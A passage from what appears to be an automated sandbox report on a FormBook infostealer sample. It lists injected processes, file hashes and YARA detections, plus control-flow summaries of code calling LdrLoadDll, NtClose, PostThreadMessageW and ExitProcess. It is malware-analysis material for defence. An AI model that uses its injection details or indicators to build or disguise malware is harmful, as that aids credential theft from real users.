                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:04:10:30
                                                        Start date:04/11/2024
                                                        Path:C:\Windows\SysWOW64\xcopy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                                        Imagebase:0xbc0000
                                                        File size:43'520 bytes
                                                        MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:04:10:44
                                                        Start date:04/11/2024
                                                        Path:C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe"
                                                        Imagebase:0xcd0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:04:10:56
                                                        Start date:04/11/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff6bf500000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:1.4%
                                                          Dynamic/Decrypted Code Coverage:5%
                                                          Signature Coverage:14%
                                                          Total number of Nodes:121
                                                          Total number of Limit Nodes:6
                                                          execution_graph 79028 42f543 79031 42e443 79028->79031 79034 42c703 79031->79034 79033 42e45c 79035 42c71d 79034->79035 79036 42c72e RtlFreeHeap 79035->79036 79036->79033 79037 424b03 79038 424b1c 79037->79038 79039 424b67 79038->79039 79042 424ba4 79038->79042 79044 424ba9 79038->79044 79040 42e443 RtlFreeHeap 79039->79040 79041 424b74 79040->79041 79043 42e443 RtlFreeHeap 79042->79043 79043->79044 79045 42e523 79048 42c6b3 79045->79048 79047 42e53e 79049 42c6d0 79048->79049 79050 42c6e1 RtlAllocateHeap 79049->79050 79050->79047 79051 42b983 79052 42b9a0 79051->79052 79055 3672df0 LdrInitializeThunk 79052->79055 79053 42b9c8 79055->79053 79064 424773 79065 42478f 79064->79065 79066 4247b7 79065->79066 79067 4247cb 79065->79067 79068 42c393 NtClose 79066->79068 79069 42c393 NtClose 79067->79069 79070 4247c0 79068->79070 79071 4247d4 79069->79071 79074 42e563 RtlAllocateHeap 79071->79074 79073 4247df 79074->79073 79056 41b103 79057 41b147 79056->79057 79058 41b168 79057->79058 79060 42c393 79057->79060 79061 42c3ad 79060->79061 79062 42c3be NtClose 79061->79062 79062->79058 79075 413f33 79076 413f40 79075->79076 79081 417643 79076->79081 79078 413f68 79079 413fad 79078->79079 79080 413f9c PostThreadMessageW 79078->79080 79080->79079 79082 417667 79081->79082 79083 4176a3 LdrLoadDll 79082->79083 79084 41766e 79082->79084 79083->79084 79084->79078 79085 41e2f3 79086 41e319 79085->79086 79090 41e40a 79086->79090 79091 42f583 RtlAllocateHeap RtlFreeHeap 79086->79091 79088 41e3a8 79088->79090 79092 42b9d3 79088->79092 79091->79088 79093 42b9ed 79092->79093 79096 3672c0a 79093->79096 79094 42ba19 79094->79090 79097 3672c1f LdrInitializeThunk 79096->79097 79098 3672c11 79096->79098 79097->79094 79098->79094 79099 401933 79100 401945 79099->79100 79103 42f9b3 79100->79103 79106 42e013 79103->79106 79107 42e036 79106->79107 79118 407363 79107->79118 79109 42e04c 79117 4019d6 79109->79117 79121 41af13 79109->79121 79111 42e06b 79114 42e080 79111->79114 79136 42c753 79111->79136 79132 428053 79114->79132 79115 42e09a 79116 42c753 ExitProcess 79115->79116 79116->79117 79139 416363 79118->79139 79120 407370 79120->79109 79122 41af3f 79121->79122 79150 41ae03 79122->79150 79125 41af84 79127 41afa0 79125->79127 79130 42c393 NtClose 79125->79130 79126 41af6c 79128 41af77 79126->79128 79129 42c393 NtClose 79126->79129 79127->79111 79128->79111 79129->79128 79131 41af96 79130->79131 79131->79111 79133 4280b5 79132->79133 79135 4280c2 79133->79135 79161 4184b3 79133->79161 79135->79115 79137 42c76d 79136->79137 79138 42c77e ExitProcess 79137->79138 79138->79114 79140 416380 79139->79140 79142 416399 79140->79142 79143 42ce13 79140->79143 79142->79120 79145 42ce2d 79143->79145 79144 42ce5c 79144->79142 79145->79144 79146 42b9d3 LdrInitializeThunk 79145->79146 79147 42cebc 79146->79147 79148 42e443 RtlFreeHeap 79147->79148 79149 42ced5 79148->79149 79149->79142 79151 41ae1d 79150->79151 79155 41aef9 79150->79155 79156 42ba73 79151->79156 79154 42c393 NtClose 79154->79155 79155->79125 79155->79126 79157 42ba90 79156->79157 79160 36735c0 LdrInitializeThunk 79157->79160 79158 41aeed 79158->79154 79160->79158 79163 4184dd 79161->79163 79162 4189db 79162->79135 79163->79162 79169 413bb3 79163->79169 79165 418601 79165->79162 79166 42e443 RtlFreeHeap 79165->79166 79167 418619 79166->79167 79167->79162 79168 42c753 ExitProcess 79167->79168 79168->79162 79173 413bd0 79169->79173 79171 413c2c 79171->79165 79172 413c36 79172->79165 79173->79172 79174 41b223 RtlFreeHeap LdrInitializeThunk 79173->79174 79174->79171 79063 3672b60 LdrInitializeThunk 79175 418bf8 79176 42c393 NtClose 79175->79176 79177 418c02 79176->79177

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 108 417643-41766c call 42f023 111 417672-417680 call 42f623 108->111 112 41766e-417671 108->112 115 417690-4176a1 call 42dae3 111->115 116 417682-41768d call 42f8c3 111->116 121 4176a3-4176b7 LdrLoadDll 115->121 122 4176ba-4176bd 115->122 116->115 121->122
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: d6b98b567937928296f7bfcee46d33d0d1baee42ad8d79cd9bd29663671db433
                                                          • Instruction ID: b795e7e6b562159716bb8a3a9a8210ee1d996490b047c819ccc5ba51bba0f81a
                                                          • Opcode Fuzzy Hash: d6b98b567937928296f7bfcee46d33d0d1baee42ad8d79cd9bd29663671db433
                                                          • Instruction Fuzzy Hash: 450152B1E0010DBBDF10DBE5DC42FDEB3789B14308F4041A6E90897241F634EB488BA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 142 42c393-42c3cc call 4047d3 call 42d5f3 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C3C7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 67760d01e0e64bfc1f90b50a1059344feaca71bea94d77112bfacca8492087be
                                                          • Instruction ID: 55dd4b48f92d8c2a2b566b1c7848c00e08c940a946d93db6b04fb11f725cdaf3
                                                          • Opcode Fuzzy Hash: 67760d01e0e64bfc1f90b50a1059344feaca71bea94d77112bfacca8492087be
                                                          • Instruction Fuzzy Hash: 39E086756102147BD510FB5ADC41FDB77ADEFC6714F40401AFA08A7141C6B5B91187F5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                          • Instruction ID: 14704e88bd9990a7bf10593cddd3698b0d90077dcbd448423a2d23fe0b545408
                                                          • Opcode Fuzzy Hash: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                          • Instruction Fuzzy Hash: 3A90023160550802D100B6584554746100687D4301FA5C511A042466CE87D58A5165A2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                          • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                                          • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                          • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                          • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                                          • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                          • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcf4caad160564636b26226d7b2490bcf23ae8d0bf0f56c8ef1529fe39c5015b
                                                          • Instruction ID: cded43eb748148d4de2a34be524072e94d7dfb7053ff2e4a98e502cc55bc9e17
                                                          • Opcode Fuzzy Hash: fcf4caad160564636b26226d7b2490bcf23ae8d0bf0f56c8ef1529fe39c5015b
                                                          • Instruction Fuzzy Hash: 58F190B0E00219AFDF24DF95CC81AEEB779AF44304F1481AEE505A7341DB749A85CF99

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00413FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 09e8f1bb1ba291129d64a678407489d69289edf13dae7507c1902bac533d82a6
                                                          • Instruction ID: 338c5d9a958f78ef2d2a2f6fc7fbce831fb862e804996383ed06185bedf7557b
                                                          • Opcode Fuzzy Hash: 09e8f1bb1ba291129d64a678407489d69289edf13dae7507c1902bac533d82a6
                                                          • Instruction Fuzzy Hash: 6911EB72D0015CBF9B10DA959C41DEFF77CEE50355B04405BF904A7210D66D9E468BA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 17 413f2f-413f52 call 42e4e3 21 413f58-413f9a call 417643 call 404743 call 424c23 17->21 22 413f53 call 42eef3 17->22 29 413fba-413fc0 21->29 30 413f9c-413fab PostThreadMessageW 21->30 22->21 30->29 31 413fad-413fb7 30->31 31->29
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00413FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 72ce6f15a79200708fd743db74431a3e9b3f9e364349b8293f308d82c8a06914
                                                          • Instruction ID: c4563edbc0d6492e8fc3be28c7700c3fed58b0aa7a4282a89a89fc4e28e3edb9
                                                          • Opcode Fuzzy Hash: 72ce6f15a79200708fd743db74431a3e9b3f9e364349b8293f308d82c8a06914
                                                          • Instruction Fuzzy Hash: 400108B1D0111C7EEB10AAA68C81CEFBB7CEF40394F418059F90477201E6684E068BA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 32 413ed7-413f9a call 417643 call 404743 call 424c23 40 413fba-413fc0 32->40 41 413f9c-413fab PostThreadMessageW 32->41 41->40 42 413fad-413fb7 41->42 42->40
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00413FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 5ce74f719a0491cd40ead9e89385fe128d58f868772b6ba7c852590215450b97
                                                          • Instruction ID: 8c32935b5f65a97548000dc570a04795f1cb7aafa2af2e4cfb2b9e853cb3b9cd
                                                          • Opcode Fuzzy Hash: 5ce74f719a0491cd40ead9e89385fe128d58f868772b6ba7c852590215450b97
                                                          • Instruction Fuzzy Hash: 460148B1E041597ADB00ABA0CC81CEFBB7CDF81365F14809AFD046B200E6384E078BE6

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 43 413f33-413f52 call 42e4e3 47 413f58-413f9a call 417643 call 404743 call 424c23 43->47 48 413f53 call 42eef3 43->48 55 413fba-413fc0 47->55 56 413f9c-413fab PostThreadMessageW 47->56 48->47 56->55 57 413fad-413fb7 56->57 57->55
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00413FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 29c9c7fd83eddeba52dc4067c64558f578c956de4c9383a7fb8dcc8e61e51f2e
                                                          • Instruction ID: a5e390cd228d483d4142bcef716239a871c8f7dcfabf716b9579389eb164b3cd
                                                          • Opcode Fuzzy Hash: 29c9c7fd83eddeba52dc4067c64558f578c956de4c9383a7fb8dcc8e61e51f2e
                                                          • Instruction Fuzzy Hash: AD01DBB1D0115C7EEB10AAE69C81CEFBB7CEF41794F458059F90477200E67C5E0687A5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 76 417636-417640 77 4175c2-4175d1 76->77 78 417642 76->78 81 4175d3-4175d7 77->81 82 4175fc-41760d call 417363 77->82 79 417644-41765f 78->79 80 417699-4176a1 78->80 83 417667-41766c 79->83 84 417662 call 42f023 79->84 85 4176a3-4176b7 LdrLoadDll 80->85 86 4176ba-4176bd 80->86 87 4175da-4175e1 81->87 95 417632-417635 82->95 96 41760f-417613 82->96 90 417672-417680 call 42f623 83->90 91 41766e-417671 83->91 84->83 85->86 87->87 89 4175e3-4175e6 87->89 89->82 93 4175e8-4175ed 89->93 100 417690-417694 call 42dae3 90->100 101 417682-41768d call 42f8c3 90->101 97 4175f3-4175fa 93->97 99 417616-41761d 96->99 97->82 97->97 99->99 102 41761f-417622 99->102 100->80 101->100 102->95 105 417624-417626 102->105 107 417629-417630 105->107 107->95 107->107
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: c98fb51a9e1d2e40843ab7da1f74b27952c8e00f7a35a2fd68a6b2ef368d7608
                                                          • Instruction ID: 4b2d3a8af1e36e8cc7acc96a62dfd30d3adbccd269dbe5961718dea2e6615160
                                                          • Opcode Fuzzy Hash: c98fb51a9e1d2e40843ab7da1f74b27952c8e00f7a35a2fd68a6b2ef368d7608
                                                          • Instruction Fuzzy Hash: 8931253590C14AAFDF10DF48D885EFAB775EF11308F044197EC888B242EA769E88CB94

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 123 41770c-417714 124 417716-417725 123->124 125 4176ae-4176b7 LdrLoadDll 123->125 126 4176b8-4176bd 124->126 129 417727-417733 124->129 125->126 130 417738-417741 129->130 130->130 131 417743-417744 130->131
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: caa329f26759531445c8ecac7f8a50c9d073a426a0ef8d106c42fb11f13c969c
                                                          • Instruction ID: 05532e2d3cb3f5e119dfab36fcb9cb4fdf3dd66ae82f5b0e0c11cd24830e5642
                                                          • Opcode Fuzzy Hash: caa329f26759531445c8ecac7f8a50c9d073a426a0ef8d106c42fb11f13c969c
                                                          • Instruction Fuzzy Hash: 9DF05C3429899F97E709FEF8CD45BCD7B50AB86625F1043EDE028970C2D252150695DA

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 132 42c6b3-42c6f7 call 4047d3 call 42d5f3 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041E3A8,?,?,00000000,?,0041E3A8,?,?,?), ref: 0042C6F2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: baa3b6cdea3c91ca57ad97a0b12ec13dc773fd9db494acde4f90a4d4f1f8807b
                                                          • Instruction ID: 64aaf34eb5034f43346def8e2ece837d2bcefb1bbac7ee18e6f2d0f0e903f317
                                                          • Opcode Fuzzy Hash: baa3b6cdea3c91ca57ad97a0b12ec13dc773fd9db494acde4f90a4d4f1f8807b
                                                          • Instruction Fuzzy Hash: FDE09276600205BBD614EF59EC41FDB37ECEFC5714F00801AFA08A7281D6B0B91087B5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 137 42c703-42c744 call 4047d3 call 42d5f3 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0C7D8B00,00000007,00000000,00000004,00000000,00416F2B,000000F4), ref: 0042C73F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 6327b2f013aa8d52872de2e3116625fa5956145b8c64010be149d9a6c13f8ac8
                                                          • Instruction ID: c6994fd5a180936d031d12b29a56de0107a2277291273a94e2cb2567dfbe4636
                                                          • Opcode Fuzzy Hash: 6327b2f013aa8d52872de2e3116625fa5956145b8c64010be149d9a6c13f8ac8
                                                          • Instruction Fuzzy Hash: E9E06DB56042047BD614EF59DC41F9B33ACEFCA714F00401AF908A7241C7B1BD1087B9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 147 42c753-42c78c call 4047d3 call 42d5f3 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,A511289A,?,?,A511289A), ref: 0042C787
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: e07dfbc639160dfb60205a99553f9de4b6471b42231161100a8585bba42a10d8
                                                          • Instruction ID: 19fe9cd4b595d81c802f1400d0debbc85c19e7e9df0d35cdcd108105ddbb584d
                                                          • Opcode Fuzzy Hash: e07dfbc639160dfb60205a99553f9de4b6471b42231161100a8585bba42a10d8
                                                          • Instruction Fuzzy Hash: DCE08C76610214BBE620EB6ADC41F9B776CDFC6718F40401AFA08AB241C7B4B95187F9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 152 417704-417705 153 417707-41770b 152->153 154 4176ab-4176b7 LdrLoadDll 152->154 155 4176ba-4176bd 154->155
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 659be0d109884b3fdf964b69afc1407a158082cfa7de64f3bded03eee985e34e
                                                          • Instruction ID: 06395242692e07dec23e742cbc311d2f1d045ecd9babc6af34bfd0c16b3e5fe9
                                                          • Opcode Fuzzy Hash: 659be0d109884b3fdf964b69afc1407a158082cfa7de64f3bded03eee985e34e
                                                          • Instruction Fuzzy Hash: 64C0802244D18C778F35C9DC55011DCFF50DF87124704C7CAAC9D57543C7210C155282

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 156 3672c0a-3672c0f 157 3672c11-3672c18 156->157 158 3672c1f-3672c26 LdrInitializeThunk 156->158
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                          • Instruction ID: 8879c64833d99df56973c153897a30f1d1648756cce15cdd82e5853e14c7e5b8
                                                          • Opcode Fuzzy Hash: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                          • Instruction Fuzzy Hash: B4B09B719015C5C5DA51F7604708717790567D1701F59C561D3030755F4779C1D1E175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                                          • Instruction ID: 579dbb5c965ea333aca3dc55a386f555582a637ebc135a81a8874d41969481f9
                                                          • Opcode Fuzzy Hash: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                                          • Instruction Fuzzy Hash: 56929975608341ABD720DE24C890BABB7F8BB88754F184D2DFA949B350D770E885CF96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-3089669407
                                                          • Opcode ID: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                                          • Instruction ID: fe5cc9c18bd150f53253cd5fdb831e2684913840c2a20cfe30ccc87c1fa21018
                                                          • Opcode Fuzzy Hash: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                                          • Instruction Fuzzy Hash: 168122B2D01618AF8B22FB98DDC5DEFB7FDAB15610B054525FA01FB104E724ED148BA0
                                                          Strings
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 036A5543
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A540A, 036A5496, 036A5519
                                                          • Invalid debug info address of this critical section, xrefs: 036A54B6
                                                          • 8, xrefs: 036A52E3
                                                          • undeleted critical section in freed memory, xrefs: 036A542B
                                                          • Address of the debug info found in the active list., xrefs: 036A54AE, 036A54FA
                                                          • Critical section debug info address, xrefs: 036A541F, 036A552E
                                                          • double initialized or corrupted critical section, xrefs: 036A5508
